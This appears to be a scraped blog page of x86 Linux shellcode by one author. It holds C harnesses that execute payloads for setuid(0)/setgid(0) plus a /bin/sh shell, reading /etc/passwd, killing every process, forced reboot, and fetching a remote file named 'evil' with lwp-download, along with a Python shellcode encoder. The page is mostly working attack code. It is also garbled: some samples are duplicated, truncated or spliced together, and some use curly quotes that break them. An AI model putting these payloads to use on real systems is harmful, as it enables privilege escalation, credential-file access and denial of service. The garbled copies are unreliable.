"\xb1\x08" /* mov $0x8,%cl */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xor %eax,%eax */
"\xb0\x01" /* mov $0x1,%al */
"\x31\xdb" /* xor %ebx,%ebx */
"\xcd\x80" /* int $0x80 */
"\xe8\xea\xff\xff\xff" /* call 0x8048062 */
"\x50" /* push %eax */
"\x77\x4e" /* ja 0x80480c9 */
"\x65" /* gs */
"\x44" /* inc %esp */
"\x20\x21" /* and %ah,(%ecx) */
"\x21"; /* .byte 0x21 */
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(shellcode));
((void (*)(void)) shellcode)();
return 0;
}
39 bytes sys_setuid(0) & sys_setgid(0) & execve (“/bin/sh”) x86 linux shellcode
/*
Name : 39 bytes sys_setuid(0) & sys_setgid(0) & execve ("/bin/sh") x86 linux shellcode
Date : Tue Jun 1 21:29:10 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web : http://devilzc0de.org
blog : http://gunslingerc0de.wordpress.com
tested on : linux debian
*/
#include <stdio.h>
char *shellcode=
"\xeb\x19" /* jmp 0x804807b */
"\x31\xc0" /* xor %eax,%eax */
"\xb0\x17" /* mov $0x17,%al */
"\x31\xdb" /* xor %ebx,%ebx */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xor %eax,%eax */
"\xb0\x2e" /* mov $0x2e,%al */
"\x31\xdb" /* xor %ebx,%ebx */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xor %eax,%eax */
"\xb0\x0b" /* mov $0xb,%al */
"\x5b" /* pop %ebx */
"\x89\xd1" /* mov %edx,%ecx */
"\xcd\x80" /* int $0x80 */
"\xe8\xe2\xff\xff\xff" /* call 0x8048062 */
"\x2f" /* das */
"\x62\x69\x6e" /* bound %ebp,0x6e(%ecx) */
"\x2f" /* das */
"\x73\x68" /* jae 0x80480ef */
"";
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(shellcode));
((void (*)(void)) shellcode)();
return 0;
}
/bin/cat /etc/passwd 43 bytes x86 linux
/*
Title : /bin/cat /etc/passwd 43 bytes x86 linux
Name : 43 bytes sys_execve("/bin/cat","/etc/passwd") x86 linux shellcode
Date : may, 31 2009
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web : devilzc0de.com
blog : gunslingerc0de.wordpress.com
tested on : linux debian
*/
#include <stdio.h>
char *shellcode=
"\xeb\x15" /* jmp 0x8048077 */
"\x31\xc0" /* xor %eax,%eax */
"\xb0\x0f" /* mov $0xf,%al */
"\x5b" /* pop %ebx */
"\x31\xc9" /* xor %ecx,%ecx */
"\x66\xb9\xff\x01" /* mov $0x1ff,%cx */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xor %eax,%eax */
"\xb0\x01" /* mov $0x1,%al */
"\x31\xdb" /* xor %ebx,%ebx */
"\xcd\x80" /* int $0x80 */
"\xe8\xe6\xff\xff\xff" /* call 0x8048062 */
"\x2f" /* das */
"\x65" /* gs */
"\x74\x63" /* je 0x80480e3 */
"\x2f" /* das */
"\x73\x68" /* jae 0x80480eb */
"\x61" /* popa */
"\x64\x6f" /* outsl %fs "(%esi),(%dx) */
"\x77" /* .byte 0x77 */
"\x31\xc0" // xorl %eax,%eax
"\xb0\x0b" // mov $0xb,%al
"\x99" // cdq
"\x52" // push edx
"\x68\x2f\x63\x61\x74" // push dword 0x7461632f
"\x68\x2f\x62\x69\x6e" // push dword 0x6e69622f
"\x89\xe3" // mov ebx,esp
"\x52" // push edx
"\x68\x61\x64\x6f\x77" // push dword 0x64777373
"\x68\x2f\x2f\x73\x68" // push dword 0x61702f2f
"\x68\x2f\x65\x74\x63" // push dword 0x6374652f
"\x89\xe1" // mov ecx,esp
"\x52" // push edx
"\x51" // push ecx
"\x53" // push ebx
"\x89\xe1" // mov ecx,esp
"\xcd\x80"; // int 80h
int main()
{
fprintf(stdout,"Length: %d\n",strlen(shellcode));
(*(void (*)()) shellcode)();
return 0;
}
/*
shellcode[]="\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64" "\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80";
*/
ascii shellcode encoder decoder tool
#!/usr/bin/python
'''
This is ascii <-> shellcode encode / decoder tool
programmer : gunslinger_ <yudha.gunslinger[at]gmail.com>
This was written for educational purpose only. or fucking messing around...
i.e how to use encode mode :
--------------------------------------------------------------
gunslinger@localhost:~/shellcode$ ./shellcodeencdec.py
shellcode hex encode decoder
programmer : gunslinger_
what do you want to do ? encode / decode
=> encode
Please input data : /bin
shellcode => \x2f\x62\x69\x6e
gunslinger@localhost:~/shellcode$
--------------------------------------------------------------
i.e how to use decode mode :
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
we know 'x68' is push, so drop it...
"\x2f\x2f\x73\x68" $0x68732f2f
"\x2f\x62\x69\x6e" $0x6e69622f
--------------------------------------------------------------
gunslinger@localhost:~/shellcode$ ./shellcodeencdec.py
shellcode hex encode decoder
programmer : gunslinger_
what do you want to do ? encode / decode
=> decode
Please input data : \x2f\x2f\x73\x68
hex => 2f2f7368
plaintext => //sh
gunslinger@localhost:~/shellcode$ ./shellcodeencdec.py
shellcode hex encode decoder
programmer : gunslinger_
what do you want to do ? encode / decode
=> decode
Please input data : \x2f\x62\x69\x6e
hex => 2f62696e
plaintext => /bin
gunslinger@localhost:~/shellcode$
--------------------------------------------------------------
and we got that is "/bin//sh"
warning ! this is not disassemble tool !
'''
import binascii, sys, time
RED = '\033[31m'
WHITE = '\033[37m'
RESET = '\033[0;0m'
def main():
print "shellcode hex encode decoder"
print "programmer : gunslinger_ <yudha.gunslinger[at]gmail.com>"
print "what do you want to do ? %sencode%s / %sdecode%s" % (RED, RESET, WHITE, RESET)
q = raw_input("=> ")
if q == "encode":
inputtype = raw_input("Please input data : ")
print "shellcode => ",
for encoded in inputtype:
print "\b\\x"+encoded.encode("hex"),
sys.stdout.flush()
time.sleep(0.5)
print RESET
elif q == "decode":
inputtype = raw_input("Please input data : ")
cleaninput = inputtype.replace("\\x","")
print "hex => ",cleaninput
print "plaintext => ",
print "\b"+cleaninput.decode("hex")
else:
print "wrong answer ! your choice is %sencode%s or %sdecode%s" % (RED, RESET, WHITE, RESET)
sys.exit(1)
if __name__ == '__main__':
main()
kill all running process linux x86 shellcode
/*
Title : kill all running process
Name : 11 bytes sys_kill(-1,9) x86 linux shellcode
Date : may, 31 2010
Author : gunslinger_
Web : devilzc0de.com
blog : gunslingerc0de.wordpress.com
tested on : ubuntu linux
*/
#include <stdio.h>
char *killer=
"\x31\xc0" /* xor %eax,%eax */
"\xb0\x25" /* mov $0x25,%al */
"\x6a\xff" /* push $0xffffffff */
"\x5b" /* pop %ebx */
"\xb1\x09" /* mov $0x9,%cl */
"\xcd\x80" /* int $0x80 */
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(killer));
((void (*)(void)) killer)();
return 0;
}
45 bytes sys_execve(“/bin/sh”, “0″, “0″) with umask 16 (sys_umask(14)) x86 linux shellcode
/*
Name : 45 bytes sys_execve("/bin/sh", "0", "0") with umask 16 (sys_umask(14)) x86 linux shellcode
Date : may, 31 2010
Author : gunslinger_
Web : devilzc0de.com
blog : gunslinger.devilzc0de.com
tested on : linux debian
*/
int main(){
char shell[] = "\x31\xc0\x31\xdb\x31\xdb\x31\xd2\x31"
"\xc9\xb0\x3c\x31\xdb\xb3\x0e\xcd\x80"
"\xeb\x0b\x5b\x31\xc0\x31\xc9\x31\xd2"
"\xb0\x0b\xcd\x80\xe8\xf0\xff\xff\xff"
"\x2f\x62\x69\x6e\x2f\x73\x68";
(*(void (*)()) shell)();
}
45 bytes sys_execve(“/bin/sh”, “-c”, “reboot”) x86 linux shellcode
/*
Name : 45 bytes sys_execve("/bin/sh", "-c", "reboot") x86 linux shellcode
Date : may, 31 2010
Author : gunslinger_
Web : devilzc0de.com
blog : gunslinger.devilzc0de.com
tested on : linux debian
*/
int main(void)
{
char dark[] = "\x6a\x0b\x58\x99\x52\x68\x6f\x74\x20\x20\x68\x72\x65\x62\x6f"
"\x89\xe6\x52\x66\x68\x2d\x63\x89\xe1\x52\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e\x89\xe3\x52\x56\x51\x53\x89\xe1\xcd\x80";
void(*door)()=(void*)dark;
door();
return 0;
}
55 bytes sys_execve(“/bin/sh”, “-c”, “ping localhost”) x86 linux shellcode
/*
Name : 55 bytes sys_execve("/bin/sh", "-c", "ping localhost") x86 linux shellcode
Date : may, 31 2010
Author : gunslinger_
Web : devilzc0de.com
blog : gunslinger.devilzc0de.com
tested on : linux debian
*/
char asshole[] = "\x6a\x0b" // push $0xb
"\x58" // pop %eax
"\x99" // cltd
"\x52" // push %edx
"\x68\x73\x74\x20\x20" // push $0x20207473
"\x68\x61\x6c\x68\x6f" // push $0x6f686c61
"\x68\x20\x6c\x6f\x63" // push $0x636f6c20
"\x68\x70\x69\x6e\x67" // push $0x676e6970
"\x89\xe6" // mov %esp,%esi
"\x52" // push %edx
"\x66\x68\x2d\x63" // pushw $0x632d
"\x89\xe1" // mov %esp,%ecx
"\x52" // push %edx
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp,%ebx
"\x52" // push %edx
"\x56" // push %esi
"\x51" // push %ecx
"\x53" // push %ebx
"\x89\xe1" // mov %esp,%ecx
"\xcd\x80"; // int $0x80
int main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) asshole;
(int)(*func)();
}
52 bytes sys_execve(“/usr/bin/lwp-download”, “evil”) x86 linux shellcode
/*
Name : 52 bytes sys_execve("/usr/bin/lwp-download", "evil") x86 linux shellcode
Date : may, 31 2009
Author : gunslinger_
Web : devilzc0de.com
blog : gunslingerc0de.wordpress.com
tested on : linux debian
*/
char getter[] = "\x6a\x0b\x58\x99\x52\x68"
"\x65\x76\x69\x6c" // evil
"\x89\xe1\x52\x6a\x64\x68"
"\x6e\x6c\x6f\x61\x68\x2d"
"\x64\x6f\x77\x68\x2f\x6c"
"\x77\x70\x68\x2f\x62\x69"
"\x6e\x68\x2f\x75\x73\x72"
"\x89\xe3\x52\x51\x53\x89"
"\xe1\xcd\x80\x40\xcd\x80";
int main(void)
{
(*(void(*)()) getter)();
return 0;
}
38 bytes sys_mkdir(“/tmp/dir”,1) x86 linux shellcode
/*
Name : 38 bytes sys_mkdir("/tmp/dir",1) x86 linux shellcode
Date : may, 31 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web : devilzc0de.com
blog : gunslingerc0de.wordpress.com
tested on : linux debian
*/
/*
gunslinger@localhost:~/shellcode$ objdump -d mkdir
mkdir: file format elf32-i386
Disassembly of section .text:
08048060 <.text>:
8048060: eb 17 jmp 0x8048079
8048062: 31 c0 xor %eax,%eax
8048064: 31 db xor %ebx,%ebx
8048066: 31 d2 xor %edx,%edx
8048068: 31 c9 xor %ecx,%ecx
804806a: b0 27 mov $0x27,%al
804806c: 5b pop %ebx
804806d: b1 00 mov $0x0,%cl
804806f: cd 80 int $0x80
8048071: 31 c0 xor %eax,%eax
8048073: b0 01 mov $0x1,%al
8048075: 31 db xor %ebx,%ebx
8048077: cd 80 int $0x80
8048079: e8 e4 ff ff ff call 0x8048062
804807e: 2f das
804807f: 74 6d je 0x80480ee
8048081: 70 2f jo 0x80480b2
8048083: 64 fs
8048084: 69 .byte 0x69
8048085: 72 .byte 0x72
gunslinger@localhost:~/shellcode$
*/
#include <stdio.h>
char shellcodedir[] = "\xeb\x17"
"\x31\xc0"
"\x31\xdb"
"\x31\xd2"
"\x31\xc9"
"\xb0\x27"
"\x5b"
"\xb1\x01"
"\xcd\x80"
"\x31\xc0"
"\xb0\x01"
"\x31\xdb"
"\xcd\x80"
"\xe8\xe4\xff\xff\xff"
"\x2f"
"\x74\x6d"
"\x70\x2f"
"\x64"
"\x69"
"\x72";
int main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) shellcodedir;
(int)(*func)();
}
/bin/cat /etc/passwd 43 bytes x86 linux
/*
Title : /bin/cat /etc/passwd 43 bytes x86 linux
Name : 43 bytes sys_execve("/bin/cat","/etc/passwd") x86 linux shellcode
Date : may, 31 2009
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web : devilzc0de.com
blog : gunslingerc0de.wordpress.com
tested on : linux debian
*/
#include <stdio.h>
char *shellcode=
"\x31\xc0" // xorl %eax,%eax
"\xb0\x0b" // mov $0xb,%al
"\x99" // cdq
"\x52" // push edx
"\x68\x2f\x63\x61\x74" // push dword 0x7461632f
"\x68\x2f\x62\x69\x6e" // push dword 0x6e69622f
"\x89\xe3" // mov ebx,esp
"\x52" // push edx
"\x68\x73\x73\x77\x64" // push dword 0x64777373
"\x68\x2f\x2f\x70\x61" // push dword 0x61702f2f
"\x68\x2f\x65\x74\x63" // push dword 0x6374652f
"\x89\xe1" // mov ecx,esp
"\x52" // push edx
"\x51" // push ecx
"\x53" // push ebx
"\x89\xe1" // mov ecx,esp
"\xcd\x80"; // int 80h
int main()
{
fprintf(stdout,"Length: %d\n",strlen(shellcode));
(*(void (*)()) shellcode)();
return 0;
}
/*
shellcode[]="\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64" "\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80";
*/
55 bytes sys_execve(“/bin/sh”, “-c”, “ping localhost”) x86 linux shellcode
/*
Name : 55 bytes sys_execve(“/bin/sh”, “-c”, “ping localhost”) x86 linux shellcode
Date : may, 31 2010
Author : gunslinger_
Web : devilzc0de.com
blog : gunslinger.devilzc0de.com
tested on : linux debian
*/
char asshole[] = “\x6a\x0b” // push $0xb
“\x58″ // pop %eax
“\x99″ // cltd
“\x52″ // push %edx
“\x68\x73\x74\x20\x20″ // push $0×20207473
“\x68\x61\x6c\x68\x6f” // push $0x6f686c61
“\x68\x20\x6c\x6f\x63″ // push $0x636f6c20
“\x68\x70\x69\x6e\x67″ // push $0x676e6970
“\x89\xe6″ // mov %esp,%esi
“\x52″ // push %edx
“\x66\x68\x2d\x63″ // pushw $0x632d
“\x89\xe1″ // mov %esp,%ecx
“\x52″ // push %edx
“\x68\x2f\x2f\x73\x68″ // push $0x68732f2f
“\x68\x2f\x62\x69\x6e” // push $0x6e69622f
“\x89\xe3″ // mov %esp,%ebx
“\x52″ // push %edx
“\x56″ // push %esi
“\x51″ // push %ecx
“\x53″ // push %ebx
“\x89\xe1″ // mov %esp,%ecx
“\xcd\x80″; // int $0×80
int main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) asshole;
(int)(*func)();
}
45 bytes sys_execve(“/bin/sh”, “-c”, “reboot”) x86 linux shellcode
/*
Name : 45 bytes sys_execve(“/bin/sh”, “-c”, “reboot”) x86 linux shellcode
Date : may, 31 2010
Author : gunslinger_
Web : devilzc0de.com
blog : gunslinger.devilzc0de.com
tested on : linux debian
*/
int main(void)
{
char dark[] = “\x6a\x0b\x58\x99\x52\x68\x6f\x74\x20\x20\x68\x72\x65\x62\x6f”
“\x89\xe6\x52\x66\x68\x2d\x63\x89\xe1\x52\x68\x2f\x2f\x73\x68″
“\x68\x2f\x62\x69\x6e\x89\xe3\x52\x56\x51\x53\x89\xe1\xcd\x80″;
void(*door)()=(void*)dark;
door();
return 0;
}
33 bytes hard / unclean reboot but data not be lost x86 linux shellcode
/*
Title : hard reboot (without any message) and data not lost shellcode
Name : 33 bytes hard / unclean reboot but data not be lost x86 linux shellcode
Date : Thu Jun 3 12:54:55 2010
Author : gunslinger_
Web : http://devilzc0de.org
blog : http://gunslingerc0de.wordpress.com
tested on : linux ubuntu 9.04 , may cause fsck on reboot
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org)
greetz to : flyff666, whitehat, ketek, chaer, peneter, and all devilzc0de crew
*/
#include
char *shellcode=
“\xb0\x24″ /* mov $0×24,%al */
“\xcd\x80″ /* int $0×80 */
“\x31\xc0″ /* xor %eax,%eax */
“\xb0\x58″ /* mov $0×58,%al */
“\xbb\xad\xde\xe1\xfe” /* mov $0xfee1dead,%ebx */
“\xb9\x69\x19\x12\x28″ /* mov $0×28121969,%ecx */
“\xba\x67\x45\x23\x01″ /* mov $0×1234567,%edx */
“\xcd\x80″ /* int $0×80 */
“\x31\xc0″ /* xor %eax,%eax */
“\xb0\x01″ /* mov $0×1,%al */
“\x31\xdb” /* xor %ebx,%ebx */
“\xcd\x80″; /* int $0×80 */
int main(void)
{
fprintf(stdout,”Length: %d\n”,strlen(shellcode));
((void (*)(void)) shellcode)();
return 0;
}
10 bytes killall x86 linux shellcode
/*
Name : 10 bytes killall x86 linux shellcode
Date : may, 31 2009
Author : gunslinger_
Web : devilzc0de.com
blog : gunslingerc0de.wordpress.com
tested on : linux debian
*/
/*
section .text
global _start
_start:
mov al, 37
push byte -1
pop ebx
push byte 9
pop ecx
int 0x80
*/
char killme[]=
"\xb0\x25" /* mov $0x25,%al */
"\x6a\xff" /* push $0xffffffff */
"\x5b" /* pop %ebx */
"\x6a\x09" /* push $0x9 */
"\x59" /* pop %ecx */
"\xcd\x80"; /* int $0x80 */
/* end of shellcode - shgen by andreas n. */
int main(void)
{
(*(void(*)()) killme)();
return 0;
}
recent comment